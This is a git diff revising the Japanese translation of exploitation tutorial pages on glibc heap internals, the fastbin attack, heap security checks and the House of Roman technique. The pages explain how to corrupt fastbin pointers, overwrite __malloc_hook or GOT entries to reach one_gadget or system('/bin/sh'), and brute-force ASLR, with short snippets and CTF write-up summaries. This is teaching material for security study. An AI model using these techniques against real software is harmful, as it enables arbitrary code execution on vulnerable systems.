@@ -149,17 +149,17 @@ memset (tcache, 0, sizeof (tcache_perthread_struct)); #### Tcache インデックス -Tcache には、サイズに応じていくつかのビンがあり、**各インデックスの最初のチャンクへのポインタとインデックスごとのチャンクの量はチャンク内にあります**。これは、この情報(通常は最初のもの)を持つチャンクを特定することで、すべての tcache 初期ポイントと Tcache チャンクの量を見つけることができることを意味します。 +Tcache には、サイズに応じた複数のビンがあり、**各インデックスの最初のチャンクへのポインタとインデックスごとのチャンクの量はチャンク内にあります**。これは、この情報を持つチャンク(通常は最初のもの)を特定することで、すべての tcache 初期ポイントと Tcache チャンクの量を見つけることができることを意味します。 ### ファストビン -ファストビンは、**小さなチャンクのメモリ割り当てを高速化するために設計されています**。最近解放されたチャンクを迅速にアクセスできる構造に保持します。これらのビンは、後入れ先出し(LIFO)アプローチを使用しており、**最も最近解放されたチャンクが最初**に再利用されます。これは、スタックの上部から挿入および削除する方が、キュー(FIFO)よりも速いため、速度にとって有利です。 +ファストビンは、**小さなチャンクのメモリ割り当てを高速化するために設計されています**。最近解放されたチャンクを迅速にアクセスできる構造に保持します。これらのビンは、後入れ先出し(LIFO)アプローチを使用しており、**最も最近解放されたチャンクが最初**に再利用されます。これは、スタックの上部からの挿入と削除がキュー(FIFO)と比較して速いため、速度にとって有利です。 -さらに、**ファストビンは単方向リンクリストを使用**しており、双方向リンクではないため、速度がさらに向上します。ファストビンのチャンクは隣接するチャンクとマージされないため、中間から削除を可能にする複雑な構造は必要ありません。単方向リンクリストは、これらの操作に対してよりシンプルで迅速です。 +さらに、**ファストビンは単方向リンクリストを使用**しており、双方向リンクではないため、速度がさらに向上します。ファストビンのチャンクは隣接するチャンクとマージされないため、中間からの削除を可能にする複雑な構造は必要ありません。単方向リンクリストは、これらの操作に対してよりシンプルで迅速です。 基本的に、ここで起こることは、ヘッダー(最初のチャンクをチェックするためのポインタ)が常にそのサイズの最新の解放されたチャンクを指しているということです。したがって: -- そのサイズの新しいチャンクが割り当てられると、ヘッダーは使用するための空きチャンクを指します。この空きチャンクが次に使用するチャンクを指しているため、このアドレスはヘッダーに保存され、次の割り当てが利用可能なチャンクを取得する場所を知ることができます。 +- そのサイズの新しいチャンクが割り当てられると、ヘッダーは使用するための空きチャンクを指しています。この空きチャンクが次に使用するチャンクを指しているため、このアドレスはヘッダーに保存され、次の割り当てが利用可能なチャンクを取得する場所を知ることができます。 - チャンクが解放されると、空きチャンクは現在の利用可能なチャンクへのアドレスを保存し、この新しく解放されたチャンクへのアドレスがヘッダーに置かれます。 リンクリストの最大サイズは `0x80` であり、サイズ `0x20` のチャンクはインデックス `0` に、サイズ `0x30` のチャンクはインデックス `1` に配置されます... @@ -244,16 +244,16 @@ Fastbins[idx=1, size=0x30] 0x00 ### 未整理ビン -未整理ビンは、ヒープマネージャーによってメモリ割り当てを迅速に行うために使用される**キャッシュ**です。動作は次のようになります:プログラムがチャンクを解放すると、そのチャンクがtcacheやファストビンに割り当てられず、トップチャンクと衝突しない場合、ヒープマネージャーはすぐに特定の小さなビンや大きなビンに入れません。代わりに、最初に**隣接する空きチャンクとマージしようとします**。これにより、より大きな空きメモリブロックが作成されます。その後、この新しいチャンクは「未整理ビン」と呼ばれる一般的なビンに配置されます。 +未整理ビンは、ヒープマネージャーによってメモリ割り当てを迅速に行うために使用される**キャッシュ**です。動作は次のとおりです:プログラムがチャンクを解放すると、そのチャンクがtcacheやファストビンに割り当てられず、トップチャンクと衝突しない場合、ヒープマネージャーはすぐに特定の小さなビンや大きなビンに入れません。代わりに、まず**隣接する空きチャンクとマージしようとします**。これにより、より大きな空きメモリブロックが作成されます。その後、この新しいチャンクは「未整理ビン」と呼ばれる一般的なビンに配置されます。 -プログラムが**メモリを要求すると**、ヒープマネージャーは**未整理ビンをチェック**して、十分なサイズのチャンクがあるかどうかを確認します。見つかれば、すぐに使用します。未整理ビンに適切なチャンクが見つからない場合は、このリスト内のすべてのチャンクをサイズに基づいて対応するビン(小または大)に移動します。 +プログラムが**メモリを要求すると**、ヒープマネージャーは**未整理ビンをチェック**して、十分なサイズのチャンクがあるかどうかを確認します。見つかれば、すぐにそれを使用します。未整理ビンに適切なチャンクが見つからない場合は、このリスト内のすべてのチャンクをサイズに基づいて対応するビン(小または大)に移動します。 注意すべきは、より大きなチャンクが2つの半分に分割され、残りがMINSIZEより大きい場合、それは未整理ビンに戻されるということです。 -したがって、未整理ビンは、最近解放されたメモリを迅速に再利用することでメモリ割り当てを加速し、時間のかかる検索やマージの必要性を減らす方法です。 +したがって、未整理ビンは、最近解放されたメモリを迅速に再利用することによってメモリ割り当てを加速し、時間のかかる検索やマージの必要性を減らす方法です。 > [!CAUTION] -> チャンクが異なるカテゴリであっても、利用可能なチャンクが別の利用可能なチャンクと衝突している場合(元々異なるビンに属していても)、それらはマージされることに注意してください。 +> チャンクが異なるカテゴリであっても、利用可能なチャンクが別の利用可能なチャンクと衝突している場合(たとえ元々異なるビンに属していても)、それらはマージされることに注意してください。
@@ -285,9 +285,9 @@ free(chunks[i]); return 0; } ``` -同じサイズの9つのチャンクを割り当てて解放する方法に注意してください。これにより、**tcacheが満たされ**、8つ目は**fastbinには大きすぎる**ため、未ソートのビンに格納されます。そして9つ目は解放されていないため、8つ目と9つ目は**トップチャンクとマージされません**。 +9つの同じサイズのチャンクを割り当てて解放する方法に注意してください。これにより、**tcacheが満たされ**、8つ目は**fastbinには大きすぎる**ため、未ソートのビンに格納されます。そして9つ目は解放されていないため、9つ目と8つ目は**トップチャンクとマージされません**。 -それをコンパイルし、`main`関数の`ret`オペコードにブレークポイントを設定してデバッグします。次に、`gef`を使用すると、tcacheビンが満杯で、1つのチャンクが未ソートのビンにあることがわかります: +それをコンパイルし、`main`関数の`ret`オペコードにブレークポイントを設定してデバッグします。次に、`gef`を使用すると、tcacheビンが満杯であり、1つのチャンクが未ソートのビンにあることがわかります。 ```bash gef➤ heap bins ──────────────────────────────────────────────────────────────────────────────── Tcachebins for thread 1 ──────────────────────────────────────────────────────────────────────────────── @@ -311,7 +311,7 @@ Fastbins[idx=6, size=0x80] 0x00 スモールビンはラージビンよりも速いですが、ファストビンよりは遅いです。 -62の各ビンは**同じサイズのチャンク**を持ちます:16、24、...(32ビットでの最大サイズは504バイト、64ビットでの最大サイズは1024バイト)。これは、スペースを割り当てるべきビンを見つける速度や、これらのリストへのエントリの挿入と削除を助けます。 +62の各ビンは**同じサイズのチャンク**を持ちます:16、24、...(32ビットで最大504バイト、64ビットで最大1024バイト)。これは、スペースを割り当てるべきビンを見つける速度や、これらのリストへのエントリの挿入と削除を助けます。 スモールビンのサイズはビンのインデックスに応じて次のように計算されます: @@ -394,17 +394,17 @@ Fastbins[idx=6, size=0x80] 0x00 ### 大きなビン -小さなビンが固定サイズのチャンクを管理するのに対し、各**大きなビンはチャンクサイズの範囲を扱います**。これはより柔軟で、システムが**さまざまなサイズ**を別々のビンなしで収容できるようにします。 +小さなビンが固定サイズのチャンクを管理するのに対し、各**大きなビンはチャンクサイズの範囲を扱います**。これはより柔軟で、システムが**さまざまなサイズ**を別々のビンを必要とせずに対応できるようにします。 -メモリアロケータでは、大きなビンは小さなビンが終了するところから始まります。大きなビンの範囲は徐々に大きくなり、最初のビンは512バイトから576バイトのチャンクをカバーし、次のビンは576バイトから640バイトをカバーします。このパターンは続き、最大のビンは1MBを超えるすべてのチャンクを含みます。 +メモリアロケータでは、大きなビンは小さなビンが終わるところから始まります。大きなビンの範囲は徐々に大きくなり、最初のビンは512バイトから576バイトのチャンクをカバーし、次のビンは576バイトから640バイトをカバーします。このパターンは続き、最も大きなビンは1MBを超えるすべてのチャンクを含みます。 -大きなビンは小さなビンに比べて操作が遅くなります。なぜなら、**最適なフィットを見つけるためにさまざまなチャンクサイズのリストをソートして検索しなければならないからです**。チャンクが大きなビンに挿入されると、それはソートされ、メモリが割り当てられるときにシステムは適切なチャンクを見つけなければなりません。この追加の作業により、**遅くなります**が、大きな割り当ては小さな割り当てよりも一般的ではないため、許容できるトレードオフです。 +大きなビンは、小さなビンに比べて操作が遅くなります。なぜなら、**最適なフィットを見つけるためにさまざまなチャンクサイズのリストをソートし、検索しなければならないからです**。チャンクが大きなビンに挿入されると、それはソートされなければならず、メモリが割り当てられるとき、システムは適切なチャンクを見つけなければなりません。この追加の作業により、**遅くなります**が、大きな割り当ては小さなものよりも一般的ではないため、許容できるトレードオフです。 以下があります: - 64B範囲のビンが32個(小さなビンと衝突) - 512B範囲のビンが16個(小さなビンと衝突) -- 4096B範囲のビンが8個(小さなビンと部分的に衝突) +- 4096B範囲のビンが8個(部分的に小さなビンと衝突) - 32768B範囲のビンが4個 - 262144B範囲のビンが2個 - 残りのサイズ用のビンが1個 @@ -468,7 +468,7 @@ chunks[0] = malloc(0x2000); return 0; } ``` -2つの大きなアロケーションが行われ、その後1つが解放され(未ソートビンに入る)、より大きなアロケーションが行われます(解放されたものが未ソートビンから大きなビンに移動します)。 +2つの大きなアロケーションが行われ、その後1つが解放され(未ソートビンに入る)、より大きなアロケーションが行われます(未ソートビンから大きなビンに解放されたものが移動します)。 それをコンパイルし、`main`関数の`ret`オペコードにブレークポイントを設定してデバッグします。次に、`gef`を使用すると、tcacheビンが満杯であり、1つのチャンクが大きなビンにあることがわかります。 ```bash @@ -519,10 +519,10 @@ the 2 preceding words to be zero during this interval as well.) /* Conveniently, the unsorted bin can be used as dummy top on first call */ #define initial_top(M) (unsorted_chunks (M)) ``` -基本的に、これは現在利用可能なヒープのすべてのチャンクを含んでいます。mallocが実行されると、使用するための利用可能なフリーチャンクがない場合、このトップチャンクは必要なスペースを確保するためにサイズを減少させます。\ +基本的に、これは現在利用可能なヒープを含むチャンクです。mallocが実行されると、使用するための利用可能なフリーチャンクがない場合、このトップチャンクはサイズを減少させて必要なスペースを確保します。\ トップチャンクへのポインタは`malloc_state`構造体に格納されています。 -さらに、最初は、未整列チャンクをトップチャンクとして使用することが可能です。 +さらに、最初は、未ソートチャンクをトップチャンクとして使用することが可能です。
@@ -553,8 +553,8 @@ Chunk(addr=0xaaaaaaac16d0, size=0x410, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ [0x0000aaaaaaac16d0 41 41 41 41 41 41 41 0a 00 00 00 00 00 00 00 00 AAAAAAA.........] Chunk(addr=0xaaaaaaac1ae0, size=0x20530, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA) ← top chunk ``` -トップチャンクがアドレス `0xaaaaaaac1ae0` にあることがわかります。これは驚くべきことではありません。なぜなら、最後に割り当てられたチャンクは `0xaaaaaaac12a0` にあり、サイズは `0x410` で、`0xaaaaaaac12a0 + 0x410 = 0xaaaaaaac1ae0` だからです。\ -トップチャンクの長さは、そのチャンクヘッダーでも確認できます: +トップチャンクがアドレス `0xaaaaaaac1ae0` にあることが確認できます。これは驚くべきことではなく、最後に割り当てられたチャンクは `0xaaaaaaac12a0` にあり、サイズは `0x410` で、`0xaaaaaaac12a0 + 0x410 = 0xaaaaaaac1ae0` です。\ +また、チャンクヘッダーにあるトップチャンクの長さも確認できます: ```bash gef➤ x/8wx 0xaaaaaaac1ae0 - 16 0xaaaaaaac1ad0: 0x00000000 0x00000000 0x00020531 0x00000000 @@ -568,7 +568,8 @@ mallocが使用され、チャンクが分割されると(例えば、未整 ## 割り当てフロー -チェックアウト: +チェックしてください: + {{#ref}} heap-memory-functions/malloc-and-sysmalloc.md @@ -576,7 +577,8 @@ heap-memory-functions/malloc-and-sysmalloc.md ## 解放フロー -チェックアウト: +チェックしてください: + {{#ref}} heap-memory-functions/free.md @@ -584,7 +586,8 @@ heap-memory-functions/free.md ## ヒープ関数のセキュリティチェック -ヒープで広く使用される関数によって実行されるセキュリティチェックを確認するには: +ヒープで広く使用される関数によって実行されるセキュリティチェックを確認してください: + {{#ref}} heap-memory-functions/heap-functions-security-checks.md diff --git a/src/binary-exploitation/libc-heap/fast-bin-attack.md b/src/binary-exploitation/libc-heap/fast-bin-attack.md index 9e4b4e367..f0c72299f 100644 --- a/src/binary-exploitation/libc-heap/fast-bin-attack.md +++ b/src/binary-exploitation/libc-heap/fast-bin-attack.md @@ -4,15 +4,16 @@ ## 基本情報 -For more information about what is a fast bin check this page: +Fast bin についての詳細はこのページを参照してください: + {{#ref}} bins-and-memory-allocations.md {{#endref}} -Because the fast bin is a singly linked list, there are much less protections than in other bins and just **modifying an address in a freed fast bin** chunk is enough to be able to **allocate later a chunk in any memory address**. +Fast bin は単方向リストであるため、他の bin よりも保護が少なく、**解放された fast bin** チャンクのアドレスを**変更するだけで、任意のメモリアドレスにチャンクを後で割り当てることができます**。 -As summary: +要約すると: ```c ptr0 = malloc(0x20); ptr1 = malloc(0x20); @@ -118,28 +119,28 @@ printf("\n\nJust like that, we executed a fastbin attack to allocate an address } ``` > [!CAUTION] -> グローバル変数 **`global_max_fast`** の値を大きな数で上書きできる場合、これによりより大きなサイズのファストビンチャンクを生成でき、以前は不可能だったシナリオでファストビン攻撃を実行できる可能性があります。この状況は、[large bin attack](large-bin-attack.md) および [unsorted bin attack](unsorted-bin-attack.md) の文脈で有用です。 +> グローバル変数 **`global_max_fast`** の値を大きな数で上書きできる場合、これによりより大きなサイズのファストビンチャンクを生成できるようになり、以前は不可能だったシナリオでファストビン攻撃を実行できる可能性があります。この状況は、[large bin attack](large-bin-attack.md) および [unsorted bin attack](unsorted-bin-attack.md) の文脈で有用です。 ## 例 - **CTF** [**https://guyinatuxedo.github.io/28-fastbin_attack/0ctf_babyheap/index.html**](https://guyinatuxedo.github.io/28-fastbin_attack/0ctf_babyheap/index.html)**:** - チャンクを割り当て、解放し、その内容を読み取り、(オーバーフロー脆弱性を使用して)埋めることが可能です。 - **情報漏洩のためのチャンクの統合**: この技術は基本的にオーバーフローを悪用して偽の `prev_size` を作成し、1つの前のチャンクをより大きなチャンクの中に入れることです。これにより、別のチャンクを含むより大きなチャンクを割り当てると、そのデータを印刷してlibcへのアドレス(`main_arena+88`)を漏洩させることが可能になります。 -- **mallocフックの上書き**: これには、前の重複状況を悪用して、同じメモリを指す2つのチャンクを持つことが可能でした。したがって、両方を解放すること(保護を回避するためにその間に別のチャンクを解放する)で、同じチャンクをファストビンに2回持つことが可能でした。その後、それを再度割り当て、次のチャンクへのアドレスを `__malloc_hook` の少し前を指すように上書きしました(mallocがフリーサイズだと思う整数を指すように - 別のバイパス)、再度割り当てて、mallocフックへのアドレスを受け取る別のチャンクを割り当てました。\ -最後に、**one gadget** がそこに書き込まれました。 +- **mallocフックの上書き**: これには、前の重複状況を悪用して、同じメモリを指す2つのチャンクを持つことが可能でした。したがって、両方を解放する(保護を回避するためにその間に別のチャンクを解放する)ことで、同じチャンクをファストビンに2回持つことが可能になりました。その後、再度割り当てて、次のチャンクへのアドレスを `__malloc_hook` の少し前を指すように上書きしました(mallocがフリーサイズだと思う整数を指すように - 別のバイパス)。再度割り当てて、mallocフックへのアドレスを受け取る別のチャンクを割り当てました。\ +最後に **one gadget** がそこに書き込まれました。 - **CTF** [**https://guyinatuxedo.github.io/28-fastbin_attack/csaw17_auir/index.html**](https://guyinatuxedo.github.io/28-fastbin_attack/csaw17_auir/index.html)**:** - ヒープオーバーフローと使用後の解放、ダブルフリーがあります。チャンクが解放されると、ポインタを再利用して再解放することが可能です。 -- **Libc情報漏洩**: いくつかのチャンクを解放すると、メインアリーナの一部の位置へのポインタが得られます。解放されたポインタを再利用できるため、このアドレスを読み取るだけです。 -- **ファストビン攻撃**: 割り当てへのすべてのポインタは配列内に保存されているため、いくつかのファストビンチャンクを解放し、最後のものにアドレスを上書きしてこのポインタの配列の少し前を指すようにします。その後、同じサイズのチャンクをいくつか割り当てると、最初に正当なものが得られ、その後ポインタの配列を含む偽のものが得られます。これで、この割り当てポインタを上書きして `free` のGOTアドレスを `system` を指すようにし、次にチャンク1に `"/bin/sh"` を書き込んで `free(chunk1)` を呼び出すと、代わりに `system("/bin/sh")` が実行されます。 +- **Libc情報漏洩**: いくつかのチャンクを解放すると、メインアリーナの一部の位置へのポインタが得られます。解放されたポインタを再利用できるので、このアドレスを読み取るだけです。 +- **ファストビン攻撃**: 割り当てへのすべてのポインタは配列に格納されているため、いくつかのファストビンチャンクを解放し、最後のもののアドレスをこのポインタの配列の少し前を指すように上書きします。その後、同じサイズのチャンクをいくつか割り当てると、最初に正当なものが得られ、その後ポインタの配列を含む偽のものが得られます。これで、この割り当てポインタを上書きして、`free` のGOTアドレスを `system` を指すようにし、次にチャンク1に `"/bin/sh"` を書き込んで `free(chunk1)` を呼び出すと、代わりに `system("/bin/sh")` が実行されます。 - **CTF** [**https://guyinatuxedo.github.io/33-custom_misc_heap/csaw19_traveller/index.html**](https://guyinatuxedo.github.io/33-custom_misc_heap/csaw19_traveller/index.html) -- 1バイトのオーバーフローを悪用して、未ソートビン内のチャンクを統合し、libc情報漏洩を取得し、その後ファストビン攻撃を実行してmallocフックをone gadgetアドレスで上書きする別の例です。 +- 1バイトのオーバーフローを悪用して、未ソートビンでチャンクを統合し、libc情報漏洩を取得し、その後ファストビン攻撃を実行してmallocフックをone gadgetアドレスで上書きする別の例です。 - **CTF** [**https://guyinatuxedo.github.io/33-custom_misc_heap/csaw18_alienVSsamurai/index.html**](https://guyinatuxedo.github.io/33-custom_misc_heap/csaw18_alienVSsamurai/index.html) - 未ソートビンを悪用してUAFでlibcアドレスとPIEアドレスを漏洩させた後、このCTFのエクスプロイトはファストビン攻撃を使用して、制御されたチャンクへのポインタがある場所にチャンクを割り当て、特定のポインタを上書きしてGOTにone gadgetを書き込むことができました。 - 未ソートビン攻撃を通じて悪用されたファストビン攻撃を見つけることができます: -- ファストビン攻撃を実行する前に、libc/heapアドレスを漏洩させるためにフリリストを悪用することが一般的であることに注意してください(必要に応じて)。 +- ファストビン攻撃を実行する前に、libc/heapアドレスを漏洩させるためにフリリストを悪用することが一般的であることに注意してください(必要な場合)。 - [**Robot Factory. BlackHat MEA CTF 2022**](https://7rocky.github.io/en/ctf/other/blackhat-ctf/robot-factory/) - サイズが `0x100` より大きいチャンクのみを割り当てることができます。 -- 未ソートビン攻撃を使用して `global_max_fast` を上書きします(ASLRのため1/16回機能します。12ビットを変更する必要がありますが、16ビットを変更する必要があります)。 +- Unsorted Bin攻撃を使用して `global_max_fast` を上書きします(ASLRのため1/16回機能します。12ビットを変更する必要がありますが、16ビットを変更する必要があります)。 - グローバルチャンク配列を変更するためのファストビン攻撃。これにより、任意の読み取り/書き込みプリミティブが得られ、GOTを変更していくつかの関数を `system` を指すように設定できます。 {{#ref}} diff --git a/src/binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.md b/src/binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.md index 7618489bc..7bb9fd73e 100644 --- a/src/binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.md +++ b/src/binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.md @@ -4,13 +4,14 @@ ## unlink -詳細については、以下を確認してください: +詳細については確認してください: + {{#ref}} unlink.md {{#endref}} -実施されたチェックの概要は以下の通りです: +実施されたチェックの概要は以下の通りです: - チャンクの指定サイズが次のチャンクに示された `prev_size` と同じか確認 - エラーメッセージ: `corrupted size vs. prev_size` @@ -21,32 +22,33 @@ unlink.md ## \_int_malloc -詳細については、以下を確認してください: +詳細については確認してください: + {{#ref}} malloc-and-sysmalloc.md {{#endref}} - **ファストビン検索中のチェック:** -- チャンクがアラインされていない場合: +- チャンクが不揃いの場合: - エラーメッセージ: `malloc(): unaligned fastbin chunk detected 2` -- フォワードチャンクがアラインされていない場合: +- フォワードチャンクが不揃いの場合: - エラーメッセージ: `malloc(): unaligned fastbin chunk detected` - 返されたチャンクのサイズがファストビンのインデックスのために正しくない場合: - エラーメッセージ: `malloc(): memory corruption (fast)` -- tcacheを埋めるために使用されたチャンクがアラインされていない場合: +- tcacheを埋めるために使用されたチャンクが不揃いの場合: - エラーメッセージ: `malloc(): unaligned fastbin chunk detected 3` - **スモールビン検索中のチェック:** - `victim->bk->fd != victim` の場合: - エラーメッセージ: `malloc(): smallbin double linked list corrupted` -- **各ファストビンチャンクに対して行われる統合中のチェック:** -- チャンクがアラインされていない場合トリガー: +- **各ファストビンチャンクに対して実施される統合中のチェック:** +- チャンクが不揃いの場合トリガー: - エラーメッセージ: `malloc_consolidate(): unaligned fastbin chunk detected` -- チャンクがインデックスのために異なるサイズを持っている場合: +- チャンクがインデックスのために異なるサイズを持つ場合: - エラーメッセージ: `malloc_consolidate(): invalid chunk size` -- 前のチャンクが使用中でなく、前のチャンクのサイズが prev_chunk に示されたサイズと異なる場合: +- 前のチャンクが使用中でなく、前のチャンクのサイズが prev_chunk に示されたものと異なる場合: - エラーメッセージ: `corrupted size vs. prev_size in fastbins` -- **ソートされていないビン検索中のチェック:** +- **未ソートビン検索中のチェック:** - チャンクサイズが異常(小さすぎるまたは大きすぎる)場合: - エラーメッセージ: `malloc(): invalid size (unsorted)` - 次のチャンクサイズが異常(小さすぎるまたは大きすぎる)場合: @@ -74,43 +76,44 @@ malloc-and-sysmalloc.md ## `tcache_get_n` -- **`tcache_get_n` のチェック:** -- チャンクがアラインされていない場合: +- **`tcache_get_n` におけるチェック:** +- チャンクが不揃いの場合: - エラーメッセージ: `malloc(): unaligned tcache chunk detected` ## `tcache_thread_shutdown` -- **`tcache_thread_shutdown` のチェック:** -- チャンクがアラインされていない場合: +- **`tcache_thread_shutdown` におけるチェック:** +- チャンクが不揃いの場合: - エラーメッセージ: `tcache_thread_shutdown(): unaligned tcache chunk detected` ## `__libc_realloc` -- **`__libc_realloc` のチェック:** -- 古いポインタがアラインされていないか、サイズが不正な場合: +- **`__libc_realloc` におけるチェック:** +- 古いポインタが不揃いであるか、サイズが不正である場合: - エラーメッセージ: `realloc(): invalid pointer` ## `_int_free` -詳細については、以下を確認してください: +詳細については確認してください: + {{#ref}} free.md {{#endref}} - **`_int_free` の開始時のチェック:** -- ポインタがアラインされている: +- ポインタが整列している: - エラーメッセージ: `free(): invalid pointer` -- サイズが `MINSIZE` より大きく、サイズもアラインされている: +- サイズが `MINSIZE` より大きく、サイズも整列している: - エラーメッセージ: `free(): invalid size` -- **`_int_free` tcache のチェック:** +- **`_int_free` tcache におけるチェック:** - `mp_.tcache_count` よりも多くのエントリがある場合: - エラーメッセージ: `free(): too many chunks detected in tcache` -- エントリがアラインされていない場合: +- エントリが不揃いの場合: - エラーメッセージ: `free(): unaligned chunk detected in tcache 2` - 解放されたチャンクがすでに解放されており、tcache にチャンクとして存在する場合: - エラーメッセージ: `free(): double free detected in tcache 2` -- **`_int_free` ファストビンのチェック:** +- **`_int_free` ファストビンにおけるチェック:** - チャンクのサイズが無効(大きすぎるまたは小さすぎる)場合トリガー: - エラーメッセージ: `free(): invalid next size (fast)` - 追加されたチャンクがすでにファストビンのトップであった場合: @@ -120,7 +123,7 @@ free.md ## **`_int_free_merge_chunk`** -- **`_int_free_merge_chunk` のチェック:** +- **`_int_free_merge_chunk` におけるチェック:** - チャンクがトップチャンクの場合: - エラーメッセージ: `double free or corruption (top)` - 次のチャンクがアリーナの境界の外にある場合: @@ -134,27 +137,27 @@ free.md ## **`_int_free_create_chunk`** -- **`_int_free_create_chunk` のチェック:** -- チャンクをソートされていないビンに追加する際、`unsorted_chunks(av)->fd->bk == unsorted_chunks(av)` を確認: +- **`_int_free_create_chunk` におけるチェック:** +- 未ソートビンにチャンクを追加する際、`unsorted_chunks(av)->fd->bk == unsorted_chunks(av)` を確認: - エラーメッセージ: `free(): corrupted unsorted chunks` ## `do_check_malloc_state` -- **`do_check_malloc_state` のチェック:** -- アラインされていないファストビンチャンクの場合: +- **`do_check_malloc_state` におけるチェック:** +- 不揃いのファストビンチャンクの場合: - エラーメッセージ: `do_check_malloc_state(): unaligned fastbin chunk detected` ## `malloc_consolidate` -- **`malloc_consolidate` のチェック:** -- アラインされていないファストビンチャンクの場合: +- **`malloc_consolidate` におけるチェック:** +- 不揃いのファストビンチャンクの場合: - エラーメッセージ: `malloc_consolidate(): unaligned fastbin chunk detected` - 不正なファストビンチャンクサイズの場合: - エラーメッセージ: `malloc_consolidate(): invalid chunk size` ## `_int_realloc` -- **`_int_realloc` のチェック:** +- **`_int_realloc` におけるチェック:** - サイズが大きすぎるまたは小さすぎる場合: - エラーメッセージ: `realloc(): invalid old size` - 次のチャンクのサイズが大きすぎるまたは小さすぎる場合: diff --git a/src/binary-exploitation/libc-heap/house-of-roman.md b/src/binary-exploitation/libc-heap/house-of-roman.md index c6dbc2636..c8aa1e98d 100644 --- a/src/binary-exploitation/libc-heap/house-of-roman.md +++ b/src/binary-exploitation/libc-heap/house-of-roman.md @@ -4,7 +4,7 @@ ## 基本情報 -これは、フェイクファストビン、アンソートビン攻撃、相対的オーバーライトを介してリークなしでRCEを可能にする非常に興味深い技術でした。しかし、これは[**パッチが当てられました**](https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=b90ddd08f6dd688e651df9ee89ca3a69ff88cd0c)。 +これは、フェイクファストビン、アンソートビン攻撃、相対的なオーバーライトを介して、リークなしでRCEを可能にする非常に興味深い技術でした。しかし、これは[**パッチが当てられました**](https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=b90ddd08f6dd688e651df9ee89ca3a69ff88cd0c)。 ### コード @@ -25,7 +25,7 @@ いくつかのチャンクを作成します: -- `fastbin_victim` (0x60, オフセット 0): 後でヒープポインタをLibC値を指すように編集するUAFチャンク。 +- `fastbin_victim` (0x60, オフセット 0): 後でヒープポインタをLibCの値を指すように編集するUAFチャンク。 - `chunk2` (0x80, オフセット 0x70): 良好なアライメントのため。 - `main_arena_use` (0x80, オフセット 0x100) - `relative_offset_heap` (0x60, オフセット 0x190): 'main_arena_use'チャンクの相対オフセット @@ -53,15 +53,15 @@ unsorted: leftover_main - `relative_offset_heap` は `fake_libc_chunk` からの距離のオフセットで、`main_arena + 0x68` へのポインタを含んでいます。 - `fastbin_victim.fd` の最後のバイトを変更することで、`fastbin_victim` が `main_arena + 0x68` を指すようにすることが可能です。 -前述の操作を行うためには、攻撃者は `fastbin_victim` の fd ポインタを変更できる必要があります。 +前述のアクションを実行するためには、攻撃者は `fastbin_victim` の fd ポインタを変更できる必要があります。 -次に、`main_arena + 0x68` はそれほど興味深くないので、ポインタを **`__malloc_hook`** を指すように変更しましょう。 +次に、`main_arena + 0x68` はそれほど興味深くないので、ポインタを **`__malloc_hook`** を指すように変更します。 -`__memalign_hook` は通常 `0x7f` で始まり、その前にゼロが続くため、`0x70` のファストビン内の値として偽装することが可能です。アドレスの最後の4ビットは **ランダム** であるため、興味のある場所に最終的に指す値の可能性は `2^4=16` です。したがって、ここで BF 攻撃が行われ、チャンクは次のようになります: **`0x70: fastbin_victim -> fake_libc_chunk -> (__malloc_hook - 0x23)`**。 +`__memalign_hook` は通常 `0x7f` で始まり、その前にゼロが続くため、`0x70` のファストビン内の値として偽装することが可能です。アドレスの最後の4ビットは **ランダム** であるため、興味のある場所に最終的に指す値の可能性は `2^4=16` です。したがって、ここで BF 攻撃が実行され、チャンクは次のようになります: **`0x70: fastbin_victim -> fake_libc_chunk -> (__malloc_hook - 0x23)`**。 (残りのバイトについての詳細は、[how2heap](https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_roman.c)[の例](https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_roman.c)の説明を確認してください)。BF が機能しない場合、プログラムは単にクラッシュします(動作するまで再試行してください)。 -その後、2つの malloc が実行され、最初の2つのファストビンチャンクが削除され、3つ目が **`__malloc_hook:`** にチャンクを取得するために割り当てられます。 +次に、2つの malloc が実行され、最初の2つのファストビンチャンクが削除され、3つ目がアロケートされて **`__malloc_hook:`** にチャンクを取得します。 ```c malloc(0x60); malloc(0x60); @@ -71,11 +71,12 @@ uint8_t* malloc_hook_chunk = malloc(0x60); 詳細については、次を確認できます: + {{#ref}} unsorted-bin-attack.md {{#endref}} -基本的には、`chunk->bk`で指定された任意の場所に`main_arena + 0x68`を書き込むことを可能にします。そして、攻撃のために`__malloc_hook`を選択します。その後、上書きした後に相対的な上書きを使用して`one_gadget`を指すようにします。 +基本的には、`chunk->bk`で指定された任意の場所に`main_arena + 0x68`を書き込むことができます。そして、攻撃のために`__malloc_hook`を選択します。その後、上書きした後に相対的な上書きを使用して`one_gadget`を指すようにします。 これを行うために、チャンクを取得し、**unsorted bin**に入れ始めます: ```c @@ -86,22 +87,22 @@ puts("Put chunk into unsorted_bin\n"); // Free the chunk to create the UAF free(unsorted_bin_ptr); ``` -このチャンクでUAFを使用して、`unsorted_bin_ptr->bk`を`__malloc_hook`のアドレスにポイントします(これは以前にブルートフォースしました)。 +このチャンクでUAFを使用して`unsorted_bin_ptr->bk`を`__malloc_hook`のアドレスにポイントします(これは以前にブルートフォースしました)。 > [!CAUTION] -> この攻撃は未整理ビンを破損させることに注意してください(したがって小と大も)。したがって、**今はファストビンからの割り当てのみを使用できます**(より複雑なプログラムは他の割り当てを行い、クラッシュする可能性があります)、そしてこれをトリガーするためには、**同じサイズを割り当てる必要があります。さもなければプログラムはクラッシュします。** +> この攻撃は未整理ビンを破損させるため(したがって小と大も)、**今はファストビンからのアロケーションのみを使用できます**(より複雑なプログラムは他のアロケーションを行い、クラッシュする可能性があります)。これをトリガーするためには、**同じサイズをアロケートする必要があります。さもなければプログラムはクラッシュします。** -したがって、`__malloc_hook`に`main_arena + 0x68`の書き込みをトリガーするために、`unsorted_bin_ptr->bk`に`__malloc_hook`を設定した後、単に**`malloc(0x80)`**を実行する必要があります。 +したがって、`__malloc_hook`に`unsorted_bin_ptr->bk`を設定した後、`main_arena + 0x68`の書き込みをトリガーするために、**`malloc(0x80)`を実行する必要があります。** ### ステップ3: 